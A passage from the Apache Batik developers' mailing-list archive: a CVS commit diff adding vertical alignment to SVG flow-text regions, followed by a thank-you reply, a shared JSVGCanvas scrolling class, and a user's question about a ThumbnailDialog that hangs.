null; n = n.getNextSibling()) { + if (n.getNodeType() != Node.ELEMENT_NODE) continue; if (n.getNamespaceURI() != getNamespaceURI()) continue; Element e = (Element)n; String ln = n.getLocalName(); - if (ln.equals(BATIK_EXT_FLOW_REGION_TAG)) { + if (ln.equals(SVGConstants.SVG_RECT_TAG)) { UnitProcessor.Context uctx; uctx = UnitProcessor.createContext(ctx, e); - Rectangle2D r2d = buildRect(uctx, e); - if (r2d != null) - ret.add(r2d); + + RegionInfo ri = buildRegion(uctx, e, verticalAlign); + if (ri != null) + regions.add(ri); } } - - return ret; } - protected Rectangle2D buildRect(UnitProcessor.Context uctx, - Element e) { + protected RegionInfo buildRegion(UnitProcessor.Context uctx, + Element e, + float verticalAlignment) { String s; // 'x' attribute - default is 0 - s = e.getAttributeNS(null, BATIK_EXT_X_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_X_ATTRIBUTE); float x = 0; if (s.length() != 0) { x = UnitProcessor.svgHorizontalCoordinateToUserSpace @@ -386,7 +413,7 @@ } // 'y' attribute - default is 0 - s = e.getAttributeNS(null, BATIK_EXT_Y_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_Y_ATTRIBUTE); float y = 0; if (s.length() != 0) { y = UnitProcessor.svgVerticalCoordinateToUserSpace @@ -394,7 +421,7 @@ } // 'width' attribute - required - s = e.getAttributeNS(null, BATIK_EXT_WIDTH_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_WIDTH_ATTRIBUTE); float w; if (s.length() != 0) { w = UnitProcessor.svgHorizontalLengthToUserSpace @@ -410,7 +437,7 @@ } // 'height' attribute - required - s = e.getAttributeNS(null, BATIK_EXT_HEIGHT_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_HEIGHT_ATTRIBUTE); float h; if (s.length() != 0) { h = UnitProcessor.svgVerticalLengthToUserSpace @@ -425,7 +452,7 @@ return null; } - return new Rectangle2D.Float(x,y,w,h); + return new RegionInfo(x,y,w,h,verticalAlignment); } /** @@ -544,7 +571,7 @@ TextPath textPath) { Map result = super.getAttributeMap(ctx, element, textPath); String s; - s = element.getAttributeNS(null, BATIK_EXT_PREFORMATTED_ATTRIBUTE); + s = element.getAttribute(BATIK_EXT_PREFORMATTED_ATTRIBUTE); if (s.length() != 0) { if (s.equals("true")) { result.put(PREFORMATTED, Boolean.TRUE); @@ -620,7 +647,7 @@ String s; float top=0, right=0, bottom=0, left=0; - s = e.getAttributeNS(null, BATIK_EXT_MARGIN_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_MARGIN_ATTRIBUTE); try { if (s.length() != 0) { float f = Float.parseFloat(s); @@ -628,28 +655,28 @@ } } catch(NumberFormatException nfe) { /* nothing */ } - s = e.getAttributeNS(null, BATIK_EXT_TOP_MARGIN_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_TOP_MARGIN_ATTRIBUTE); try { if (s.length() != 0) { float f = Float.parseFloat(s); top = f; } } catch(NumberFormatException nfe) { /* nothing */ } - s = e.getAttributeNS(null, BATIK_EXT_RIGHT_MARGIN_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_RIGHT_MARGIN_ATTRIBUTE); try { if (s.length() != 0) { float f = Float.parseFloat(s); right = f; } } catch(NumberFormatException nfe) { /* nothing */ } - s = e.getAttributeNS(null, BATIK_EXT_BOTTOM_MARGIN_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_BOTTOM_MARGIN_ATTRIBUTE); try { if (s.length() != 0) { float f = Float.parseFloat(s); bottom = f; } } catch(NumberFormatException nfe) { /* nothing */ } - s = e.getAttributeNS(null, BATIK_EXT_LEFT_MARGIN_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_LEFT_MARGIN_ATTRIBUTE); try { if (s.length() != 0) { float f = Float.parseFloat(s); @@ -657,37 +684,26 @@ } } catch(NumberFormatException nfe) { /* nothing */ } - float flLeft = left; - float flRight = right; - - s = e.getAttributeNS(null, BATIK_EXT_FIRST_LINE_LEFT_MARGIN_ATTRIBUTE); - try { - if (s.length() != 0) { - float f = Float.parseFloat(s); - flLeft = f; - } - } catch(NumberFormatException nfe) { /* nothing */ } - - s = e.getAttributeNS(null,BATIK_EXT_FIRST_LINE_RIGHT_MARGIN_ATTRIBUTE); + float indent = 0; + s = e.getAttribute(BATIK_EXT_INDENT_ATTRIBUTE); try { if (s.length() != 0) { float f = Float.parseFloat(s); - flRight = f; + indent = f; } } catch(NumberFormatException nfe) { /* nothing */ } - int justification = MarginInfo.JUSTIFY_START; - s = e.getAttributeNS(null, BATIK_EXT_JUSTIFICATION_ATTRIBUTE); + s = e.getAttribute(BATIK_EXT_JUSTIFICATION_ATTRIBUTE); try { if (s.length() != 0) { - if (s.equals("start")) { + if (BATIK_EXT_JUSTIFICATION_START_VALUE.equals(s)) { justification = MarginInfo.JUSTIFY_START; - } else if (s.equals("middle")) { + } else if (BATIK_EXT_JUSTIFICATION_MIDDLE_VALUE.equals(s)) { justification = MarginInfo.JUSTIFY_MIDDLE; - } else if (s.equals("end")) { + } else if (BATIK_EXT_JUSTIFICATION_END_VALUE.equals(s)) { justification = MarginInfo.JUSTIFY_END; - } else if (s.equals("full")) { + } else if (BATIK_EXT_JUSTIFICATION_FULL_VALUE.equals(s)) { justification = MarginInfo.JUSTIFY_FULL; } } @@ -695,8 +711,8 @@ String ln = e.getLocalName(); boolean rgnBr = ln.equals(BATIK_EXT_FLOW_REGION_BREAK_TAG); - return new MarginInfo(top, right, bottom, left, flLeft, flRight, - justification, rgnBr); + return new MarginInfo(top, right, bottom, left, + indent, justification, rgnBr); } 1.8 +3 -2 xml-batik/sources/org/apache/batik/gvt/text/GlyphIterator.java Index: GlyphIterator.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/text/GlyphIterator.java,v retrieving revision 1.7 retrieving revision 1.8 diff -u -r1.7 -r1.8 --- GlyphIterator.java 22 May 2002 21:50:40 -0000 1.7 +++ GlyphIterator.java 20 Feb 2003 11:15:47 -0000 1.8 @@ -348,7 +348,8 @@ public LineInfo newLine(Point2D.Float loc, float lineWidth, - boolean partial) { + boolean partial, + Point2D.Float verticalAlignOffset) { if (ch == SOFT_HYPHEN) { gv.setGlyphVisible(idx, true); } @@ -410,7 +411,7 @@ maxFontSize = -Float.MAX_VALUE; LineInfo ret = new LineInfo(loc, aci, gv, lineIdx, lineInfoIdx, lineInfoAdj, lineInfoAdv, lineInfoChW, - lineWidth, partial); + lineWidth, partial, verticalAlignOffset); lineIdx = idx; return ret; 1.48 +147 -56 xml-batik/sources/org/apache/batik/gvt/text/GlyphLayout.java Index: GlyphLayout.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/text/GlyphLayout.java,v retrieving revision 1.47 retrieving revision 1.48 diff -u -r1.47 -r1.48 --- GlyphLayout.java 19 Feb 2003 02:50:57 -0000 1.47 +++ GlyphLayout.java 20 Feb 2003 11:15:47 -0000 1.48 @@ -87,7 +87,6 @@ private boolean pathApplied = false; - public static final AttributedCharacterIterator.Attribute FLOW_LINE_BREAK = GVTAttributedCharacterIterator.TextAttribute.FLOW_LINE_BREAK; @@ -159,7 +158,6 @@ } - /** * Creates the specified text layout using the * specified AttributedCharacterIterator and rendering context. @@ -2010,7 +2008,7 @@ * text to wrap. There is one aci per text chunk * (which maps to flowPara elements. Used to access * font, paragraph, and line break info. - * @param ChunkLayouts A List of List of GlyphLayout objects. There + * @param chunkLayouts A List of List of GlyphLayout objects. There * is a List of GlyphLayout objects for each * flowPara element. There is a GlyphLayout * for approximately each sub element in the @@ -2021,7 +2019,6 @@ public static void textWrapTextChunk(AttributedCharacterIterator [] acis, List chunkLayouts, List flowRects) { - int justification; int numChunks = acis.length; // System.out.println("Len: " + acis.length + " Size: " + // chunkLayouts.size()); @@ -2029,27 +2026,36 @@ // Make a list of the GlyphVectors so we can construct a // multiGlyphVector that makes them all look like one big // glyphVector - GVTGlyphVector [] gvs = new GVTGlyphVector [acis.length]; + GVTGlyphVector [] gvs = new GVTGlyphVector[acis.length]; + List [] chunkLineInfos = new List [acis.length]; + GlyphIterator [] gis = new GlyphIterator [acis.length]; Iterator clIter = chunkLayouts.iterator(); // Get an iterator for the flow rects. Iterator flowRectsIter = flowRects.iterator(); // Get info for new flow rect. - Rectangle2D cRect = (Rectangle2D)flowRectsIter.next(); - float y0, x0, width, height; - height = (float)cRect.getHeight(); + RegionInfo currentRegion = null; + float y0, x0, width, height=0; + if (flowRectsIter.hasNext()) { + currentRegion = (RegionInfo) flowRectsIter.next(); + height = (float) currentRegion.getHeight(); + } boolean lineHeightRelative = true; float lineHeight = 1.0f; float nextLineMult = 0.0f; float dy = 0.0f; + // + Point2D.Float verticalAlignOffset = new Point2D.Float(0,0); + //System.out.println("Chunks: " + numChunks); float prevBotMargin = 0; for (int chunk=0; clIter.hasNext(); chunk++) { // System.out.println("Chunk: " + chunk); AttributedCharacterIterator aci = acis[chunk]; + if (currentRegion != null) { List extraP = (List)aci.getAttribute(FLOW_EMPTY_PARAGRAPH); if (extraP != null) { @@ -2065,12 +2071,15 @@ } else { // Move to next flow region.. if (!flowRectsIter.hasNext()) { - cRect = null; + currentRegion = null; break; // No flow rect stop layout here... } - cRect = (Rectangle2D)flowRectsIter.next(); - height = (float)cRect.getHeight(); + // NEXT FLOW REGION + currentRegion = (RegionInfo) flowRectsIter.next(); + height = (float) currentRegion.getHeight(); + // start a new alignment offset for this flow rect. + verticalAlignOffset = new Point2D.Float(0,0); // New rect so no previous row to consider... dy = emi.getTopMargin(); @@ -2078,7 +2087,7 @@ prevBotMargin = emi.getBottomMargin(); } - if (cRect == null) break; + if (currentRegion == null) break; } } @@ -2100,9 +2109,9 @@ if (mi == null) { continue; } - justification = mi.getJustification(); + int justification = mi.getJustification(); - if (cRect == null) { + if (currentRegion == null) { for(int idx=0; idx <numGlyphs; idx++) gv.setGlyphVisible(idx, false); continue; @@ -2114,39 +2123,57 @@ dy += inc; } else { // Move to next flow region.. + // NEXT FLOW REGION if (!flowRectsIter.hasNext()) { - cRect = null; + currentRegion = null; break; // No flow rect stop layout here... } - cRect = (Rectangle2D)flowRectsIter.next(); - height = (float)cRect.getHeight(); + // NEXT FLOW REGION + currentRegion = (RegionInfo) flowRectsIter.next(); + height = (float) currentRegion.getHeight(); + // start a new alignment offset for this flow rect.. + verticalAlignOffset = new Point2D.Float(0,0); // New rect so no previous row to consider... dy = mi.getTopMargin(); } prevBotMargin = mi.getBottomMargin(); - float leftMargin = mi.getFirstLineLeftMargin(); - float rightMargin = mi.getFirstLineRightMargin(); + float leftMargin = mi.getLeftMargin(); + float rightMargin = mi.getRightMargin(); + if (((GlyphLayout)layouts.get(0)).isLeftToRight()) { + leftMargin += mi.getIndent(); + } else { + rightMargin += mi.getIndent(); + } - x0 = (float)cRect.getX() + leftMargin; - y0 = (float)cRect.getY(); - width = (float)(cRect.getWidth() - (leftMargin+rightMargin)); - height = (float)cRect.getHeight(); + x0 = (float) currentRegion.getX() + leftMargin; + y0 = (float) currentRegion.getY(); + width = (float) (currentRegion.getWidth() - + (leftMargin + rightMargin)); + height = (float) currentRegion.getHeight(); List lineInfos = new LinkedList(); + chunkLineInfos[chunk] = lineInfos; float prevDesc = 0.0f; GlyphIterator gi = new GlyphIterator(aci, gv); + gis[chunk] = gi; + GlyphIterator breakGI = null, newBreakGI = null; if (!gi.done() && !gi.isPrinting()) { - // This will place any preceeding whitespace on an imaginary - // line that preceeds the real first line of the paragraph. - lineInfos.add(gi.newLine - (new Point2D.Float(x0, y0+dy), - width, true)); + // This will place any preceeding whitespace on an + // imaginary line that preceeds the real first line of + // the paragraph, also calculate the vertical + // alignment offset, this will be repeated until the + // last line in the flow rect. + updateVerticalAlignOffset(verticalAlignOffset, + currentRegion, dy); + lineInfos.add(gi.newLine + (new Point2D.Float(x0, y0+dy), + width, true, verticalAlignOffset)); } @@ -2161,20 +2188,24 @@ // first char on line didn't fit. // move to next flow rect. if (!flowRectsIter.hasNext()) { - cRect = null; + currentRegion = null; gi = lineGI.copy(gi); break; // No flow rect stop layout here... } - cRect = (Rectangle2D)flowRectsIter.next(); - x0 = (float) cRect.getX() + leftMargin; - y0 = (float) cRect.getY(); - width = (float)(cRect.getWidth() - + // NEXT FLOW REGION + currentRegion = (RegionInfo) flowRectsIter.next(); + x0 = (float) currentRegion.getX() + leftMargin; + y0 = (float) currentRegion.getY(); + width = (float) (currentRegion.getWidth() - (leftMargin+rightMargin)); - height = (float)cRect.getHeight(); + height = (float) currentRegion.getHeight(); + // start a new alignment offset for this flow rect.. + verticalAlignOffset = new Point2D.Float(0,0); // New rect so no previous row to consider... - dy = firstLine?mi.getTopMargin():0; ; + dy = firstLine ? mi.getTopMargin() : 0; + ; prevDesc = 0; gi = lineGI.copy(gi); continue; @@ -2259,7 +2290,7 @@ // System.out.println("Doesn't Fit: " + dy); if (!flowRectsIter.hasNext()) { - cRect = null; + currentRegion = null; gi = lineGI.copy(gi); break; // No flow rect stop layout here... } @@ -2268,15 +2299,18 @@ float oldWidth = width; // Get info for new flow rect. - cRect = (Rectangle2D)flowRectsIter.next(); - x0 = (float) cRect.getX() + leftMargin; - y0 = (float) cRect.getY(); - width = (float)(cRect.getWidth() - - (leftMargin+rightMargin)); - height = (float)cRect.getHeight(); + currentRegion = (RegionInfo) flowRectsIter.next(); + x0 = (float) currentRegion.getX() + leftMargin; + y0 = (float) currentRegion.getY(); + width = (float)(currentRegion.getWidth() - + (leftMargin+rightMargin)); + height = (float) currentRegion.getHeight(); + // start a new alignment offset for this flow rect.. + verticalAlignOffset = new Point2D.Float(0,0); // New rect so no previous row to consider... - dy = firstLine?mi.getTopMargin():0; ; + dy = firstLine ? mi.getTopMargin() : 0; + ; prevDesc = 0; // previous flows? @@ -2289,8 +2323,11 @@ prevDesc = newDesc + (nextLineMult-1)*lineBoxHeight; nextLineMult = 0f; + updateVerticalAlignOffset(verticalAlignOffset, + currentRegion, dy + bottomEdge); lineInfos.add(gi.newLine - (new Point2D.Float(x0, y0+dy), width, partial)); + (new Point2D.Float(x0, y0 + dy), width, partial, + verticalAlignOffset)); // System.out.println("Fit: " + dy); x0 -= leftMargin; @@ -2312,22 +2349,69 @@ while(idx <numGlyphs) gv.setGlyphVisible(idx++, false); - layoutChunk(aci, gv, gi.getOrigin(), justification, lineInfos); - if (mi.isFlowRegionBreak()) { // Move to next flow region.. - cRect = null; + currentRegion = null; if (flowRectsIter.hasNext()) { - cRect = (Rectangle2D)flowRectsIter.next(); - height = (float)cRect.getHeight(); + currentRegion = (RegionInfo) flowRectsIter.next(); + height = (float) currentRegion.getHeight(); dy = mi.getTopMargin(); + verticalAlignOffset = new Point2D.Float(0,0); } } } + + for (int chunk=0; chunk < acis.length; chunk++) { + List lineInfos = chunkLineInfos[chunk]; + if (lineInfos == null) continue; + + AttributedCharacterIterator aci = acis[chunk]; + aci.first(); + MarginInfo mi = (MarginInfo)aci.getAttribute(FLOW_PARAGRAPH); + if (mi == null) { + continue; + } + int justification = mi.getJustification(); + + GVTGlyphVector gv = gvs[chunk]; + if (gv == null) break; + + GlyphIterator gi = gis[chunk]; + + layoutChunk(gv, gi.getOrigin(), justification, lineInfos); + } } - public static void layoutChunk(AttributedCharacterIterator aci, - GVTGlyphVector gv, Point2D origin, + + /** + * Updates the specified verticalAlignmentOffset using the current + * alignment rule and the heights of the flow rect and the maximum + * descent of the text. This method gets for called every line, + * but only the value that is calculated for the last line of the + * flow rect is used by the glyph rendering. This is achieved by + * creating a new verticalAlignOffset object everytime a new flow + * rect is encountered, thus a single verticalAlignmentOffset is + * shared for all {@link LineInfo} objects created for a given + * flow rect. The value is calculated by determining the left + * over space in the flow rect and scaling that value by 1.0 to + * align to the bottom, 0.5 for middle and 0.0 for top. + * + * @param verticalAlignOffset the {@link Point2D.Float} object that + * is storing the alignment offset. + * @param currentRegion the {@link RegionInfo} object that we + * are rendering into. + * @param maxDescent the very lowest point this line reaches. + */ + public static void updateVerticalAlignOffset + (Point2D.Float verticalAlignOffset, + RegionInfo region, float maxDescent) + { + float freeSpace = (float)region.getHeight() - maxDescent; + verticalAlignOffset.setLocation + (0, region.getVerticalAlignment() * freeSpace); + } + + public static void layoutChunk(GVTGlyphVector gv, Point2D origin, int justification, List lineInfos) { Iterator lInfoIter = lineInfos.iterator(); @@ -2345,6 +2429,7 @@ float charW=0; float lineWidth=0; boolean partial = false; + float verticalAlignOffset = 0; // This loop goes through and puts glyphs where they belong // based on info collected in first trip through glyphVector... @@ -2370,14 +2455,19 @@ charW = li.getLastCharWidth(); lineWidth = li.getLineWidth(); partial = li.isPartialLine(); + verticalAlignOffset = li.getVerticalAlignOffset().y; xAdj = 0; xScale = 1; // Recalc justification info. switch (justification) { case 0: default: break; // Left - case 1: xAdj = (lineWidth-lineVAdv)/2; break; // Center - case 2: xAdj = lineWidth-lineVAdv; break; // Right + case 1: // Center + xAdj = (lineWidth - lineVAdv) / 2; + break; + case 2: // Right + xAdj = lineWidth - lineVAdv; + break; case 3: // Full if ((!partial) && (lineEnd != i+1)) { // More than one char on line... @@ -2388,7 +2478,8 @@ } } float x = lineLoc.x + (gp[2*i] -xOrig)*xScale+xAdj; - float y = lineLoc.y + (gp[2*i+1]-yOrig); + float y = lineLoc.y + ((gp[2 * i + 1] - yOrig) + + verticalAlignOffset); gv.setGlyphPosition(i, new Point2D.Float(x, y)); } @@ -2396,7 +2487,7 @@ float y = yOrig; if (lineLoc != null) { x = lineLoc.x + (gp[2*i] -xOrig)*xScale+xAdj; - y = lineLoc.y + (gp[2*i+1]-yOrig); + y = lineLoc.y + (gp[2 * i + 1] - yOrig) + verticalAlignOffset; } gv.setGlyphPosition(i, new Point2D.Float(x, y)); } 1.4 +7 -2 xml-batik/sources/org/apache/batik/gvt/text/LineInfo.java Index: LineInfo.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/text/LineInfo.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- LineInfo.java 8 May 2002 09:42:47 -0000 1.3 +++ LineInfo.java 20 Feb 2003 11:15:47 -0000 1.4 @@ -28,6 +28,7 @@ float lastCharWidth; float lineWidth; boolean partial; + Point2D.Float verticalAlignOffset; /** * @@ -40,7 +41,8 @@ float visualAdvance, float lastCharWidth, float lineWidth, - boolean partial) { + boolean partial, + Point2D.Float verticalAlignOffset) { this.loc = loc; this.aci = aci; this.gv = gv; @@ -51,6 +53,7 @@ this.lastCharWidth = lastCharWidth; this.lineWidth = lineWidth; this.partial = partial; + this.verticalAlignOffset = verticalAlignOffset; } public Point2D.Float getLocation() { return loc; } @@ -63,6 +66,7 @@ public float getLastCharWidth() { return lastCharWidth; } public float getLineWidth() { return lineWidth; } public boolean isPartialLine() { return partial; } + public Point2D.Float getVerticalAlignOffset() { return verticalAlignOffset; } public String toString() { return ("[LineInfo loc: " + loc + @@ -70,7 +74,8 @@ " LWidth: " + lineWidth + " Adv: " + advance + " VAdv: " + visualAdvance + " LCW: " + lastCharWidth + - " Partial: " + partial); + " Partial: " + partial + + " verticalAlignOffset: " + verticalAlignOffset); } } 1.4 +13 -16 xml-batik/sources/org/apache/batik/gvt/text/MarginInfo.java Index: MarginInfo.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/text/MarginInfo.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- MarginInfo.java 30 Apr 2002 19:08:48 -0000 1.3 +++ MarginInfo.java 20 Feb 2003 11:15:47 -0000 1.4 @@ -19,23 +19,21 @@ protected float bottom; protected float left; - protected float firstLineLeft; - protected float firstLineRight; + protected float indent; protected int justification; protected boolean flowRegionBreak; public MarginInfo(float top, float right, float bottom, float left, - float firstLineLeft, float firstLineRight, - int justification, boolean flowRegionBreak) { + float indent, int justification, + boolean flowRegionBreak) { this.top = top; this.right = right; this.bottom = bottom; this.left = left; - this.firstLineLeft = firstLineLeft; - this.firstLineRight = firstLineRight; + this.indent = indent; this.justification = justification; this.flowRegionBreak = flowRegionBreak; @@ -43,6 +41,7 @@ public MarginInfo(float margin, int justification) { setMargin(margin); + this.indent = 0; this.justification = justification; this.flowRegionBreak = false; } @@ -52,17 +51,15 @@ this.right = margin; this.bottom = margin; this.left = margin; - this.firstLineLeft = margin; - this.firstLineRight = margin; } - public float getTopMargin() { return top; } - public float getRightMargin() { return right; } - public float getBottomMargin() { return bottom; } - public float getLeftMargin() { return left; } - public float getFirstLineLeftMargin() { return firstLineLeft; } - public float getFirstLineRightMargin() { return firstLineLeft; } + public float getTopMargin() { return top; } + public float getRightMargin() { return right; } + public float getBottomMargin() { return bottom; } + public float getLeftMargin() { return left; } - public int getJustification() { return justification; } - public boolean isFlowRegionBreak() { return flowRegionBreak; } + public float getIndent() { return indent; } + + public int getJustification() { return justification; } + public boolean isFlowRegionBreak() { return flowRegionBreak; } } 1.1 xml-batik/sources/org/apache/batik/gvt/text/RegionInfo.java Index: RegionInfo.java =================================================================== /***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.gvt.text; import java.awt.geom.Rectangle2D; /** * This class holds the neccessary information to render a * <batik:regin> that is defined within the <batik:flowRegion> * element. Namely it holds the bounds of the region and the desired * vertical alignment. */ public class RegionInfo extends Rectangle2D.Float { private float verticalAlignment = 0.0f; public RegionInfo(float x, float y, float w, float h, float verticalAlignment) { super(x, y, w, h); this.verticalAlignment = verticalAlignment; } /** * Gets the vertical alignment for this flow region. * @return the vertical alignment for this flow region. * It will be 0.0 for top, 0.5 for middle and 1.0 for bottom. */ public float getVerticalAlignment() { return verticalAlignment; } /** * Sets the alignment position of the text within this flow region. * The value must be 0.0 for top, 0.5 for middle and 1.0 for bottom. * @param verticalAlignment the vertical alignment of the text. */ public void setVerticalAlignment(float verticalAlignment) { this.verticalAlignment = verticalAlignment; } } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 20 12:28:44 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96112 invoked by uid 500); 20 Feb 2003 12:28:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96064 invoked from network); 20 Feb 2003 12:28:43 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Thu, 20 Feb 2003 07:28:39 -0500 To: [email protected] Cc: [email protected] Subject: RE: cvs commit: xml-batik/sources/org/apache/batik/gvt/text RegionInfo.java GlyphIterator.java GlyphLayout.java LineInfo.java MarginInfo.java In-Reply-To: <[email protected]> References: <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "TD" == Thomas E DeWeese <[email protected]> writes: TD> Flow text syntax is now brought up to date with SVG Drafts (see TD> examples) TD> Flow text now supports vertical-align attribute on flowRegion TD> elements. I forgot to thank Andrew Pietsch for the work on vertical-align. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 20 12:28:44 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96203 invoked by uid 500); 20 Feb 2003 12:28:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96189 invoked by uid 500); 20 Feb 2003 12:28:44 -0000 Delivered-To: [email protected] X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Thu, 20 Feb 2003 07:28:39 -0500 To: [email protected] Cc: [email protected] Subject: RE: cvs commit: xml-batik/sources/org/apache/batik/gvt/text RegionInfo.java GlyphIterator.java GlyphLayout.java LineInfo.java MarginInfo.java In-Reply-To: <[email protected]> References: <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "TD" == Thomas E DeWeese <[email protected]> writes: TD> Flow text syntax is now brought up to date with SVG Drafts (see TD> examples) TD> Flow text now supports vertical-align attribute on flowRegion TD> elements. I forgot to thank Andrew Pietsch for the work on vertical-align. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 20 13:37:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93176 invoked by uid 500); 20 Feb 2003 13:37:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93131 invoked from network); 20 Feb 2003 13:37:15 -0000 X-Authentication-Warning: crozet.ago.fr: Host mehetia.ago.fr [161.129.204.104] claimed to be ago.fr Message-ID: <[email protected]> Date: Thu, 20 Feb 2003 14:41:32 +0100 From: Gerard BUNEL <[email protected]> X-Mailer: Mozilla 4.75 [fr] (WinNT; U) X-Accept-Language: fr MIME-Version: 1.0 To: [email protected], [email protected] Subject: smoother JSVGCanvas Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hello, As I wasn't really satisfied of JSVGCanvas scrolling I decide dto implement my own. The principle is that the scroll is constantly a fraction of the displayed areaeither in the X or Y direction. I've also implemented it as an inner class of my subclass of JSVGCanvas called MapView (I'm working on maps that why the name of the classes). The corresponding code is given below. To use it I've just to do the following in MapView instance: getActionMap().put(SCROLL_RIGHT_ACTION, new MapScrollAction( -1, 0)); getActionMap().put(SCROLL_LEFT_ACTION, new MapScrollAction( 1, 0)); getActionMap().put(SCROLL_UP_ACTION, new MapScrollAction( 0, 1)); getActionMap().put(SCROLL_DOWN_ACTION, new MapScrollAction( 0, -1)); That's all. Thought it could be of some help. I find this kind of scrolling more practical in the user point of view. Gerard public class MapScrollAction extends AbstractAction { protected int _xFactor; protected int _yFactor; /** * Default constructor * * @param a_XFactor * @param a_YFactor */ public MapScrollAction() { super(); } /** * Useable constructor * * @param a_XFactor * @param a_YFactor */ public MapScrollAction ( int a_XFactor, int a_YFactor) { this(); _xFactor = a_XFactor; _yFactor = a_YFactor; } /** * default Action * * @param evt */ public void actionPerformed ( ActionEvent evt) { if (gvtRoot == null) { return; } int incX = (getWidth()/4)*_xFactor; int incY = (getHeight()/4)*_yFactor;; AffineTransform at = new AffineTransform(getRenderingTransform()); double dx = at.getTranslateX() + incX; double dy = at.getTranslateY() + incY; double sx = at.getScaleX(); double sy = at.getScaleY(); at = new AffineTransform( sx, 0.0, 0.0, sy, dx, dy); setRenderingTransform(at); } } /* End of class: MapScrollAction */ -- [email protected] - Atlantide - http://www.ago.fr/atlantide/ Technopole Brest Iroise BP 80802 - 29608 Brest cedex - France - Tel. : +1-623-992-4185 - Fax. : +1-623-992-4185 - e-mail: [email protected] Centre Affaires Oberthur - 74D, rue de Paris - 35700 Rennes - France Tel. : +1-623-992-4185 - Fax : +1-623-992-4185 - e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Feb 21 13:32:48 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57661 invoked by uid 500); 21 Feb 2003 13:32:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57560 invoked from network); 21 Feb 2003 13:32:45 -0000 From: "Geeta Shukla" <[email protected]> To: <[email protected]> Cc: "[email protected]. Apache. Org" <[email protected]> Subject: Help regarding ThumnailDialog Date: Fri, 21 Feb 2003 19:02:34 +0530 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi, I am using the Thumbnail dialog (of Batik 1.5b4b version) on a JSVGCanvas in my project. My problem is that after dragging the mouse to the area of interest on the thumbnail canvas, the thumbnail dialog kind of gets hanged and doesn't allow dragging anymore until i resize the thumbnail dialog. The document displayed on my canvas is a simple SVG file with line and text elements. I am setting my JSVGCanvas to a scrollpane as shown below. JScrollPane scrollpane = new JScrollPane(); scrollpane.setViewportView(_svgCanvas); canvasPanel.add(scrollpane, BorderLayout.CENTER); Am i missing out on something? Please help! Regards Geeta --------------------------------------------------------------------- To unsubscribe, 